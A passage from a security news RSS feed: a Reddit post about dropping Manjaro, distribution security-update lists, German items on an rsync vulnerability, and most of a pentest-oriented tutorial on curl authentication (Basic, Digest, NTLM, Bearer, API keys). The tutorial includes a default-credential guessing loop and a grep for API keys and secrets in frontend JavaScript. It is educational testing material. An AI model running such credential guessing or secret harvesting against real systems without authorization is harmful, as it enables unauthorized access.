kernel, but they simply failed to trigger the usual initramfs regeneration and grub update that is standard after a kernel update via any typical package manager. </p> <p>While my Manjaro installs have all run for years without need for major intervention, I have honestly ignored a few boneheaded decisions like this in the past, but this experience made me realize that I had chosen to ignore the warning signs for a bit too long, so after a decade-long relationship, Manjaro officially no longer occupies a machine in my house. I intend to use the next few months migrating any other family members outside of my house, but decided to spend a few minutes coining this post to rant on the internet first. </p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/chozendude"> /u/chozendude </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1toerct/bye_manjaro_its_been_real/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1toerct/bye_manjaro_its_been_real/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by Debian (postorius and spip), Fedora (bind, bind-dyndb-ldap, linux-firmware, tor, and unbound), Mageia (ffmpeg, nginx, perl-Imager, and tigervnc, x11-server, x11-server-xwayland), Oracle (firefox and kernel), Red Hat (buildah, git-lfs, go-toolset:rhel8, golang,...]]></description>
<link>https://tsecurity.de/de/3548101/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3548101/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 26 May 2026 15:11:17 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (postorius and spip), <b>Fedora</b> (bind, bind-dyndb-ldap, linux-firmware, tor, and unbound), <b>Mageia</b> (ffmpeg, nginx, perl-Imager, and tigervnc, x11-server, x11-server-xwayland), <b>Oracle</b> (firefox and kernel), <b>Red Hat</b> (buildah, git-lfs, go-toolset:rhel8, golang, golang-github-openprinting-ipp-usb, grafana, grafana-pcp, gvisor-tap-vsock, java-1.8.0-openjdk, java-17-openjdk, java-21-openjdk, opentelemetry-collector, osbuild-composer, podman, rhc, rhc-worker-playbook, skopeo, and yggdrasil), <b>SUSE</b> (amazon-ecs-init, assimp, azure-storage-azcopy, busybox, firefox, gnutls, graphicsmagick, helm, kernel, leancrypto, libpng16, libppsdocument4_0-6, libsndfile, mcphost, nano, nginx, perl-http-tiny, perl-XML-LibXML, python-urllib3, python-urllib3_1, python311-ocrmypdf, python312, rclone, rsync, xen, and xz), and <b>Ubuntu</b> (dotnet8, dotnet9, dotnet10, linux-intel-iot-realtime, linux-lowlatency, linux-nvidia-6.8, linux-nvidia-tegra, linux-nvidia-tegra-igx, nltk, simpleeval, and vim).]]></content:encoded>
</item>
<item>
<title><![CDATA[[UPDATE] [hoch] Rsync: Schwachstelle ermöglicht Manipulation von Dateien]]></title>
<description><![CDATA[Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Rsync ausnutzen, um Dateien zu manipulieren.]]></description>
<link>https://tsecurity.de/de/3547901/it-security-nachrichten/update-hoch-rsync-schwachstelle-ermoeglicht-manipulation-von-dateien/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3547901/it-security-nachrichten/update-hoch-rsync-schwachstelle-ermoeglicht-manipulation-von-dateien/</guid>
<pubDate>Tue, 26 May 2026 14:08:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Rsync ausnutzen, um Dateien zu manipulieren.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in rsync (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3546981/unix-server/security-mehrere-probleme-in-rsync-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3546981/unix-server/security-mehrere-probleme-in-rsync-suse/</guid>
<pubDate>Tue, 26 May 2026 08:00:48 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by Debian (atril, evince, gnutls28, haproxy, haveged, jq, kernel, krb5, libgcrypt20, nodejs, and thunderbird), Fedora (aw-server-rust, awatcher, bind, bind-dyndb-ldap, chromium, composer, docker-buildkit, docker-buildx, dotnet10.0, dotnet8.0, dotnet9.0, evince, f...]]></description>
<link>https://tsecurity.de/de/3545828/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3545828/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 25 May 2026 16:53:19 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (atril, evince, gnutls28, haproxy, haveged, jq, kernel, krb5, libgcrypt20, nodejs, and thunderbird), <b>Fedora</b> (aw-server-rust, awatcher, bind, bind-dyndb-ldap, chromium, composer, docker-buildkit, docker-buildx, dotnet10.0, dotnet8.0, dotnet9.0, evince, firefox, httpd, kernel, nodejs-aw-webui, nss, perl-Apache-Session-Browseable, pie, python-pulp-glue, python-requests, and python3.15), <b>Slackware</b> (kernel), <b>SUSE</b> (apptainer, chromium, cockpit, dnsmasq, google-guest-agent, hauler, iproute2, jfrog-cli, kernel, libecpg6, libsolv, libzypp, zypper, mcphost, oci-cli, perl-YAML-Syck, python-lxml, python-urllib3, python311-impacket, rqlite, rsync, util-linux, and xz), and <b>Ubuntu</b> (evince, linux-azure, linux-azure-5.4, linux-azure-fips, linux-azure-4.15, linux-azure-fips, linux-fips, linux-gcp-5.15, linux-lowlatency-hwe-5.15, linux-oracle-6.17, node-path-to-regexp, and rclone).]]></content:encoded>
</item>
<item>
<title><![CDATA[Technik News 2026: Unsere Technik-News - kurz und kompakt | news.de]]></title>
<description><![CDATA[... Server 2016 und SharePoint Server 2019 veröffentlicht. Mehr über die ... IT-Sicherheit: Linux und UNIX bedroht - IT-Sicherheitslücke bei Rsync mit hohem ...]]></description>
<link>https://tsecurity.de/de/3544267/unix-server/technik-news-2026-unsere-technik-news-kurz-und-kompakt-newsde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3544267/unix-server/technik-news-2026-unsere-technik-news-kurz-und-kompakt-newsde/</guid>
<pubDate>Sun, 24 May 2026 23:30:45 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... <b>Server</b> 2016 und SharePoint <b>Server</b> 2019 veröffentlicht. Mehr über die ... IT-Sicherheit: Linux und <b>UNIX</b> bedroht - IT-Sicherheitslücke bei Rsync mit hohem ...]]></content:encoded>
</item>
<item>
<title><![CDATA[BSI warnt vor Rsync-Sicherheitslücke: CVSS 8,8 und mehrere CVEs]]></title>
<description><![CDATA[BONN / LONDON (IT BOLTWISE) – Das BSI warnt vor einer hoch bewerteten Sicherheitslücke in Rsync, die mehrere CVEs mit einem CVSS-Base-Score von 8,8 umfasst. Betroffen sind u.a. Linux/UNIX-Distributionen wie Debian, Ubuntu und SUSE sowie Open Source Rsync ab bestimmten Versionen. Angreifer könnten...]]></description>
<link>https://tsecurity.de/de/3542211/it-security-nachrichten/bsi-warnt-vor-rsync-sicherheitsluecke-cvss-88-und-mehrere-cves/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3542211/it-security-nachrichten/bsi-warnt-vor-rsync-sicherheitsluecke-cvss-88-und-mehrere-cves/</guid>
<pubDate>Sat, 23 May 2026 18:22:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-rsync-security-warning-cvss.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-rsync-security-warning-cvss.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-rsync-security-warning-cvss-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-rsync-security-warning-cvss-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-rsync-security-warning-cvss-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-rsync-security-warning-cvss-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-rsync-security-warning-cvss-120x120.jpg 120w" sizes="auto, (max-width: 1024px) 100vw, 1024px">BONN / LONDON (IT BOLTWISE) – Das BSI warnt vor einer hoch bewerteten Sicherheitslücke in Rsync, die mehrere CVEs mit einem CVSS-Base-Score von 8,8 umfasst. Betroffen sind u.a. Linux/UNIX-Distributionen wie Debian, Ubuntu und SUSE sowie Open Source Rsync ab bestimmten Versionen. Angreifer könnten Privilegien erhöhen, Informationen offenlegen, Sicherheitsmaßnahmen umgehen und im schlimmsten Fall einen Denial […]</p>
<div><a href="https://www.it-boltwise.de/bsi-warnt-vor-rsync-sicherheitsluecke-cvss-88-und-mehrere-cves.html">... den vollständigen Artikel <strong>»BSI warnt vor Rsync-Sicherheitslücke: CVSS 8,8 und mehrere CVEs«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/bsi-warnt-vor-rsync-sicherheitsluecke-cvss-88-und-mehrere-cves.html">BSI warnt vor Rsync-Sicherheitslücke: CVSS 8,8 und mehrere CVEs</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Auth Mastery Part 1: Credential Types curl Handles]]></title>
<description><![CDATA[The server tells you exactly which auth scheme it wants. Most people never read that line.Series: curl — The Request Engine You Never Learned Properly Article: 6A of 16 Status: DraftAuthentication is the first wall on almost every target. How you approach it with curl depends entirely on which sc...]]></description>
<link>https://tsecurity.de/de/3541574/hacking/auth-mastery-part-1-credential-types-curl-handles/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3541574/hacking/auth-mastery-part-1-credential-types-curl-handles/</guid>
<pubDate>Sat, 23 May 2026 10:36:40 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>The server tells you exactly which auth scheme it wants. Most people never read that line.</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*me4hh90NUg5j1JjqHVks0Q.png"></figure><blockquote><strong><em>Series:</em></strong><em> curl — The Request Engine You Never Learned Properly </em><strong><em>Article:</em></strong><em> 6A of 16 </em><strong><em>Status:</em></strong><em> Draft</em></blockquote><p>Authentication is the first wall on almost every target. How you approach it with curl depends entirely on which scheme the server is using — and identifying that scheme before picking a flag is a skill most tutorials skip entirely.</p><p>This article covers the main authentication mechanisms curl handles: Basic, Digest, NTLM, Bearer tokens, and API keys. It explains how each scheme works at the protocol level, the curl flag that invokes it, and how to read the server’s challenge to know which one you are dealing with.</p><p>Article 6B covers what happens after you authenticate: session persistence, cookie jars, CSRF token handling, and maintaining stateful access across multi-step workflows.</p><h3>Identifying Which Auth Scheme You Are Dealing With</h3><p>Before choosing a curl flag, read what the server is asking for.</p><p>An unauthenticated request to a protected resource returns a 401 Unauthorized response. The WWW-Authenticate header in that response tells you exactly which scheme to use.</p><pre>curl -sI https://httpbin.org/basic-auth/admin/password</pre><pre>HTTP/2 401<br>date: Sat, 25 Apr 2026 12:06:18 GMT<br>content-length: 0<br>server: gunicorn/19.9.0<br>www-authenticate: Basic realm="Fake Realm"<br>access-control-allow-origin: *<br>access-control-allow-credentials: true</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/616/1*Ge90CMApPJ4Vc-VH_K3A-g.png"><figcaption>One unauthenticated request reveals everything — the 401 status and the www-authenticate header tell you the scheme before you've sent a single credential</figcaption></figure><p>The www-authenticate: Basic realm="Fake Realm" header is what you are reading. One line tells you everything: the scheme is Basic, and the realm is the name the server gives to this protected area. That is your cue to reach for -u.</p><p>Reading the header:</p><pre>WWW-Authenticate value          Scheme          curl flag<br>------------------------------  --------------  ----------------------------------<br>Basic realm="..."               HTTP Basic      -u user:pass<br>Digest realm="...", nonce="..."  HTTP Digest     --digest -u user:pass<br>NTLM                            Windows NTLM    --ntlm -u user:pass<br>Bearer realm="..."              Bearer token    -H "Authorization: Bearer &lt;token&gt;"</pre><p>This is the identification workflow: request unauthenticated, read the challenge, match it to the right flag. Skipping this step and guessing the scheme wastes time and often produces confusing errors. Note that some endpoints present multiple schemes in the WWW-Authenticate header — choose one that the server actually lists as supported.</p><h3>Basic Auth</h3><p>The oldest and simplest HTTP authentication scheme. The client sends credentials in a Base64-encoded Authorization header on each request.</p><pre>curl -u admin:password http://localhost:8080/protected</pre><pre>==================================================<br>  curl Lab Echo Server<br>==================================================</pre><pre>METHOD       : GET<br>PATH         : /protected<br>FULL URL     : /protected</pre><pre>--- REQUEST HEADERS ---<br>  Host: localhost:8080<br>  Authorization: Basic YWRtaW46cGFzc3dvcmQ=<br>  User-Agent: curl/7.68.0<br>  Accept: */*</pre><pre>--- QUERY STRING PARAMS ---<br>  (none)</pre><pre>--- RAW BODY ---<br>  (empty)</pre><pre>--- PARSED BODY PARAMS ---<br>  (none)</pre><pre>==================================================</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/584/1*pU8Vu-3dZUb3-bOQab1Oow.png"><figcaption>In REQUEST HEADERS, <em>curl added the </em><em>Authorization: Basic header automatically from the </em><em>-u flag — that encoded string is </em><em>admin:password in base64</em></figcaption></figure><p>The Authorization: Basic YWRtaW46cGFzc3dvcmQ= header is visible in the REQUEST HEADERS — curl added it automatically from the -u flag. That encoded string is the credentials.</p><p>What curl actually sends:</p><pre>Authorization: Basic YWRtaW46cGFzc3dvcmQ=</pre><p>YWRtaW46cGFzc3dvcmQ= is the base64 encoding of admin:password. To decode it in the terminal:</p><pre>echo "YWRtaW46cGFzc3dvcmQ=" | base64 -d<br># Output: admin:password</pre><p>This means Basic Auth credentials are trivially readable by anyone who can intercept the traffic. They are not encrypted — they are only encoded. Basic Auth over plain HTTP is a vulnerability finding. Over HTTPS, the credentials are protected in transit by TLS, but they can still be exposed to systems that terminate TLS or log request headers — such as reverse proxies, load balancers, and application logging middleware.</p><p><strong>Why Basic Auth is still everywhere:</strong></p><p>Despite its age, Basic Auth appears constantly in internal admin panels and network devices, simple API authentication, development and staging environments, and legacy applications that predate modern auth frameworks.</p><p>When you encounter it in a test, note it. Basic Auth without HTTPS is a finding. Basic Auth with weak or default credentials is a finding.</p><p><strong>Testing default credentials:</strong></p><pre>for cred in "admin:admin" "admin:password" "admin:1234" "root:root" "admin:"; do<br>  user=$(echo $cred | cut -d: -f1)<br>  pass=$(echo $cred | cut -d: -f2)<br>  code=$(curl -s -o /dev/null -w "%{http_code}" -u "$user:$pass" http://localhost:8080/protected)<br>  echo "$cred -&gt; $code"<br>done</pre><pre>admin:admin -&gt; 200<br>admin:password -&gt; 200<br>admin:1234 -&gt; 200<br>root:root -&gt; 200<br>admin: -&gt; 200</pre><p>The lab echo server returns 200 for every request, regardless of credentials — it does not implement authentication logic. On a real target, only the correct credential pair would return 200, and the rest would return 401. The pattern is identical; the outcome depends on the target. Against httpbin with the correct credentials:</p><pre>curl -s -o /dev/null -w "%{http_code}\n" -u admin:password https://httpbin.org/basic-auth/admin/password<br># 200</pre><pre>curl -s -o /dev/null -w "%{http_code}\n" -u admin:wrongpass <a href="https://httpbin.org/basic-auth/admin/password">https://httpbin.org/basic-auth/admin/password</a><br># 401</pre><p>On a real target, a 200 where the correct credentials return success and wrong ones return 401 means the valid credential pair is a finding worth reporting.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/825/1*LQOOWNU26vvVnpIog6N_BA.png"><figcaption>the loop pattern against localhost.</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/920/1*52_KPVHzxw8nNvpwcyREbA.png"><figcaption>The same pattern against a real target — correct credentials return 200, wrong credentials return 401. The 200 is the finding.</figcaption></figure><h3>Digest Auth</h3><p>Digest authentication is a challenge-response scheme designed to address Basic Auth’s credential exposure problem. Instead of sending the password, the client computes a response using the password, a server-provided nonce, the request URI, and other values — then sends that computed response rather than the credential itself. curl handles the entire challenge-response calculation automatically when you pass --digest -u user:pass.</p><p>The flow is as follows:</p><ol><li>Client requests a protected resource without credentials</li><li>Server returns 401 with a WWW-Authenticate: Digest header containing a nonce — a one-time server-generated value</li><li>Client computes a response using the password, nonce, request URI, and other values</li><li>Client sends the computed response in the Authorization header</li><li>Server performs the same calculation independently and compares</li></ol><pre>curl -v --digest -u admin:password http://target.com/protected</pre><p>The -v output shows both requests: the initial unauthenticated request returning a 401 Digest challenge, and then the authenticated request with the computed MD5 hash in the Authorization header. The hash includes the server's nonce value, which is why captured Digest hashes cannot simply be replayed — the nonce changes with each challenge.</p><p>On a real Digest target, the verbose output looks like this:</p><pre>&gt; GET /protected HTTP/1.1<br>&lt; HTTP/1.1 401 Unauthorized<br>&lt; WWW-Authenticate: Digest realm="protected", nonce="abc123..."</pre><pre>&gt; GET /protected HTTP/1.1<br>&gt; Authorization: Digest username="admin", realm="protected",<br>&gt;   nonce="abc123...", uri="/protected", response="d41d8cd98f..."<br>&lt; HTTP/1.1 200 OK</pre><p>The two-request pattern is the distinguishing mark of any challenge-response scheme — you will see it clearly in -v output whenever Digest is in play.</p><p><strong>Digest’s weaknesses at a surface level:</strong></p><p>Digest prevents straightforward credential replay — the computed response includes the nonce, so captured responses cannot simply be replayed since the nonce changes with each challenge. That said, Digest still relies on MD5, which is considered weak by modern standards, and some implementation details can introduce subtler weaknesses. Digest is more secure than Basic but has been largely superseded by token-based authentication in modern applications.</p><p>Where you encounter Digest in the wild: older network devices such as routers and cameras, legacy internal applications, and HTTP APIs designed before token-based auth became standard.</p><h3>NTLM Auth</h3><p>NTLM (NT LAN Manager) is Microsoft’s challenge-response authentication protocol. It was designed for Windows network authentication and appears in web contexts when applications are integrated with Windows or Active Directory infrastructure.</p><pre>curl -v --ntlm -u "DOMAIN\\username:password" http://target.com/protected</pre><p>The -v output for NTLM shows a multi-step handshake with negotiate, challenge, and authenticate messages:</p><pre>&gt; GET /protected HTTP/1.1<br>&lt; HTTP/1.1 401 Unauthorized<br>&lt; WWW-Authenticate: NTLM</pre><pre>&gt; GET /protected HTTP/1.1<br>&gt; Authorization: NTLM TlRMTVNTUAABAAAA...   (NEGOTIATE message)<br>&lt; HTTP/1.1 401 Unauthorized<br>&lt; WWW-Authenticate: NTLM TlRMTVNTUAACAAAA... (CHALLENGE message)</pre><pre>&gt; GET /protected HTTP/1.1<br>&gt; Authorization: NTLM TlRMTVNTUAADAAAA...   (AUTHENTICATE message)<br>&lt; HTTP/1.1 200 OK</pre><p>Multiple round-trip, multiple Authorization headers, each containing a different NTLM message type. This exchange is unmistakable in verbose output and is direct evidence that Windows authentication is in play.</p><p>Note the double backslash in the shell — it escapes the single backslash that separates the domain from the username. On a target that does not require a domain prefix:</p><pre>curl --ntlm -u "username:password" http://target.com/protected</pre><p><strong>Where NTLM appears as a web attack surface:</strong></p><p>NTLM in HTTP shows up in SharePoint installations, Microsoft Exchange OWA, IIS-hosted applications with Windows Authentication enabled, internal intranet applications in corporate environments, and older ASP.NET applications.</p><p>On THM and HTB machines, NTLM authentication can indicate Windows-integrated services — the kind of target where credential relay attacks become relevant in later phases, though NTLM alone does not confirm Active Directory is in use.</p><h3>Bearer Tokens</h3><p>Bearer tokens are the dominant authentication mechanism in modern REST APIs. The client sends a token in the Authorization header, and the server validates it to identify and authorize the request.</p><pre>curl -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.test" \<br>  http://localhost:8080/api/data</pre><pre>==================================================<br>  curl Lab Echo Server<br>==================================================</pre><pre>METHOD       : GET<br>PATH         : /api/data<br>FULL URL     : /api/data</pre><pre>--- REQUEST HEADERS ---<br>  Host: localhost:8080<br>  User-Agent: curl/7.68.0<br>  Accept: */*<br>  Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.test</pre><pre>--- QUERY STRING PARAMS ---<br>  (none)</pre><pre>--- RAW BODY ---<br>  (empty)</pre><pre>--- PARSED BODY PARAMS ---<br>  (none)</pre><pre>==================================================</pre><p>The full token is visible in the Authorization header exactly as sent. If the token is a JWT, its three-dot structure — header, payload, signature — is clear even in the raw header value. Not every bearer token is a JWT; some are opaque strings or other formats. The format depends entirely on the application.</p><p>The token is typically obtained by making a login request first:</p><pre># Step 1: Get the token<br>TOKEN=$(curl -s \<br>  -X POST \<br>  -H "Content-Type: application/json" \<br>  -d '{"username":"admin","password":"password"}' \<br>  http://target.com/api/login | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])")</pre><pre>echo "Token: $TOKEN"</pre><pre># Step 2: Use the token<br>curl -s \<br>  -H "Authorization: Bearer $TOKEN" \<br>  <a href="http://target.com/api/users">http://target.com/api/users</a></pre><p>The token extraction pattern above uses a real API login that returns JSON. The python3 -c command extracts the token field from the response and stores it in the shell variable $TOKEN. On a target that returns a token differently — in a header, in a cookie, or under a different JSON key — adjust the extraction accordingly.</p><p><strong>JWT tokens:</strong></p><p>Many bearer tokens are JWTs (JSON Web Tokens). A JWT has three parts separated by dots:</p><pre>eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature</pre><p>The first two parts are base64url-encoded JSON. JWT uses base64url encoding rather than standard base64; padding may be missing, which can cause base64 -d to fail on some payloads. For well-formed JWT parts like the examples below, it works cleanly, but on real tokens, you may need to add = padding or use a dedicated JWT decoder:</p><pre>echo "eyJhbGciOiJIUzI1NiJ9" | base64 -d 2&gt;/dev/null</pre><pre>{"alg":"HS256"}</pre><pre>echo "eyJ1c2VyIjoiYWRtaW4ifQ" | base64 -d 2&gt;/dev/null</pre><pre>{"user":"admin"}</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/754/1*3Kn8ZEUL5k8jDK_daf3ttw.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/720/1*IPSkDF2Zq8uUZdpupyhZrA.png"><figcaption>Base64 is encoding, not encryption — one command reveals the credentials. The second shows a JWT payload decoded the same way: {"user":"admin"}</figcaption></figure><p>Reading the JWT payload tells you what claims it carries — username, role, expiry, and any other fields the application uses for authorization decisions. This is reconnaissance without touching any application logic. Look for role, admin, scope, or permissions fields — understanding what the token asserts is the first step before any token manipulation testing.</p><h3>API Key Authentication</h3><p>API keys are often operationally simpler than tokens — a static secret string the client sends with every request, with no expiry or refresh mechanism to manage. Their security properties vary widely depending on how they are issued, scoped, and rotated. They appear in three locations.</p><p><strong>In a custom header:</strong></p><pre>curl -H "X-Api-Key: your-api-key-here" http://target.com/api/data<br>curl -H "X-API-KEY: your-api-key-here" http://target.com/api/data<br>curl -H "api-key: your-api-key-here" http://target.com/api/data</pre><p>The header name varies by application. Check the API documentation or intercept a legitimate request to confirm the correct name.</p><p><strong>As a query parameter:</strong></p><pre>curl "http://target.com/api/data?api_key=your-api-key-here"<br>curl "http://target.com/api/data?key=your-api-key-here"<br>curl "http://target.com/api/data?apikey=your-api-key-here"</pre><p>API keys in query strings appear in server logs, browser history, and referrer headers. Finding an API key in a URL during testing is a finding — it should be in a header, not the URL.</p><p><strong>In the request body:</strong></p><pre>curl -H "Content-Type: application/json" \<br>  -d '{"api_key":"your-key","data":"value"}' \<br>  http://target.com/api/endpoint</pre><p><strong>Testing for API key exposure:</strong></p><p>When you encounter a web application with an API, check the JavaScript files loaded by the frontend:</p><pre># Download the main JS bundle<br>curl -s http://target.com/static/app.js | grep -iE "api[_-]?key|apikey|secret|token" | head -20</pre><p>API keys hardcoded in frontend JavaScript are a common finding. The frontend should not hold secrets — but many do.</p><h3>The Complete Identification Workflow</h3><p>Put it together. When you land on a new target and need to authenticate:</p><pre># Step 1: Request protected resource unauthenticated<br>curl -sI https://httpbin.org/basic-auth/admin/password</pre><pre>HTTP/2 401<br>www-authenticate: Basic realm="Fake Realm"<br>server: gunicorn/19.9.0</pre><pre># Step 2: Scheme identified as Basic — use -u<br>curl -v -u admin:password https://httpbin.org/basic-auth/admin/password</pre><pre>&gt; Authorization: Basic YWRtaW46cGFzc3dvcmQ=<br>&lt; HTTP/2 200<br>&lt; content-type: application/json</pre><pre>{<br>  "authenticated": true,<br>  "user": "admin"<br>}</pre><pre># Step 3: Confirm with status code only<br>curl -s -o /dev/null -w "%{http_code}\n" -u admin:password https://httpbin.org/basic-auth/admin/password<br># 200</pre><pre>curl -s -o /dev/null -w "%{http_code}\n" -u admin:wrongpass <a href="https://httpbin.org/basic-auth/admin/password">https://httpbin.org/basic-auth/admin/password</a><br># 401</pre><p>Three commands. The 401 told you the scheme. The scheme told you the flag. The 200 confirmed it worked. That is the complete identification workflow — it is the same pattern regardless of which auth scheme you encounter.</p><h3>Real Walkthrough: Identifying and Authenticating on a New Target</h3><p>The following walkthrough uses httpbin.org — a public HTTP testing service with a built-in Basic Auth endpoint at /basic-auth/{user}/{password}. The workflow is identical against any real target.</p><p><strong>Step 1 — Initial unauthenticated request, read the 401 challenge:</strong></p><pre>curl -sI https://httpbin.org/basic-auth/admin/password</pre><pre>HTTP/2 401<br>date: Sat, 25 Apr 2026 12:06:18 GMT<br>content-length: 0<br>server: gunicorn/19.9.0<br>www-authenticate: Basic realm="Fake Realm"<br>access-control-allow-origin: *<br>access-control-allow-credentials: true</pre><p>www-authenticate: Basic realm="Fake Realm" — scheme identified. Reach for -u.</p><p><strong>Step 2 — Authenticate with correct credentials:</strong></p><pre>curl -v -u admin:password https://httpbin.org/basic-auth/admin/password</pre><pre>&gt; GET /basic-auth/admin/password HTTP/2<br>&gt; Authorization: Basic YWRtaW46cGFzc3dvcmQ=<br>&gt; User-Agent: curl/7.68.0<br>&gt; Accept: */*</pre><pre>&lt; HTTP/2 200<br>&lt; content-type: application/json<br>&lt; server: gunicorn/19.9.0</pre><pre>{<br>  "authenticated": true,<br>  "user": "admin"<br>}</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/930/1*Zbalkfcg2MSbBBsaFDfYTg.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/907/1*l1vTNAqbi56Lq9BQM_uztA.png"><figcaption>The complete Basic Auth flow in verbose mode — TLS negotiation, credential sent as Base64, server confirms authentication with JSON response</figcaption></figure><p>The Authorization: Basic YWRtaW46cGFzc3dvcmQ= header was sent automatically. The server returned 200 with "authenticated": true — confirmed.</p><p><strong>Step 3 — Verify the 401 vs 200 boundary with wrong credentials:</strong></p><pre>curl -s -o /dev/null -w "%{http_code}\n" -u admin:password https://httpbin.org/basic-auth/admin/password<br># 200</pre><pre>curl -s -o /dev/null -w "%{http_code}\n" -u admin:wrongpass <a href="https://httpbin.org/basic-auth/admin/password">https://httpbin.org/basic-auth/admin/password</a><br># 401</pre><p>Correct credentials return 200. Wrong credentials return 401. That boundary is the signal in default credential testing — run the loop, watch for the status code that breaks the pattern.</p><h3>Quick Reference — Article 6A</h3><pre># Identify auth scheme<br>curl -sI http://target.com/protected<br># Read: www-authenticate header</pre><pre># Basic Auth<br>curl -u username:password <a href="http://target.com/protected">http://target.com/protected</a></pre><pre># Digest Auth<br>curl --digest -u username:password <a href="http://target.com/protected">http://target.com/protected</a></pre><pre># NTLM Auth<br>curl --ntlm -u "DOMAIN\\username:password" <a href="http://target.com/protected">http://target.com/protected</a></pre><pre># Bearer token<br>curl -H "Authorization: Bearer &lt;token&gt;" <a href="http://target.com/api/endpoint">http://target.com/api/endpoint</a></pre><pre># API key in header<br>curl -H "X-Api-Key: &lt;key&gt;" <a href="http://target.com/api/endpoint">http://target.com/api/endpoint</a></pre><pre># API key in query string (check logs — this is a finding)<br>curl "http://target.com/api/endpoint?api_key=&lt;key&gt;"</pre><pre># Default credential loop<br>for cred in "admin:admin" "admin:password" "admin:1234" "root:root"; do<br>  code=$(curl -s -o /dev/null -w "%{http_code}" -u "$cred" <a href="http://target.com/protected)">http://target.com/protected)</a><br>  echo "$cred -&gt; $code"<br>done</pre><pre># Decode Basic Auth header<br>echo "YWRtaW46cGFzc3dvcmQ=" | base64 -d</pre><pre># Decode JWT payload parts<br>echo "&lt;header_part&gt;" | base64 -d 2&gt;/dev/null<br>echo "&lt;payload_part&gt;" | base64 -d 2&gt;/dev/null</pre><pre># Extract API key from JS bundle<br>curl -s <a href="http://target.com/static/app.js">http://target.com/static/app.js</a> | grep -iE "api[_-]?key|apikey|secret|token" | head -20</pre><pre>AUTH SCHEME IDENTIFICATION<br>---------------------------<br>www-authenticate: Basic ...          -&gt;  -u user:pass<br>www-authenticate: Digest ...         -&gt;  --digest -u user:pass<br>www-authenticate: NTLM               -&gt;  --ntlm -u "DOMAIN\\user:pass"<br>www-authenticate: Bearer ...         -&gt;  -H "Authorization: Bearer &lt;token&gt;"<br>No WWW-Authenticate, custom header   -&gt;  -H "X-Api-Key: &lt;key&gt;"<br>No WWW-Authenticate, query param     -&gt;  ?api_key=&lt;key&gt; (finding if so)</pre><p>The core discipline this article builds: read the server’s challenge before picking a curl flag. The server tells you which authentication scheme it uses — you just have to know where to look.</p><p><em>Next: Article 6B — Auth Mastery Part 2: Sessions, Cookies, and Staying Authenticated</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=7b10a5b810d2" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/auth-mastery-part-1-credential-types-curl-handles-7b10a5b810d2">Auth Mastery Part 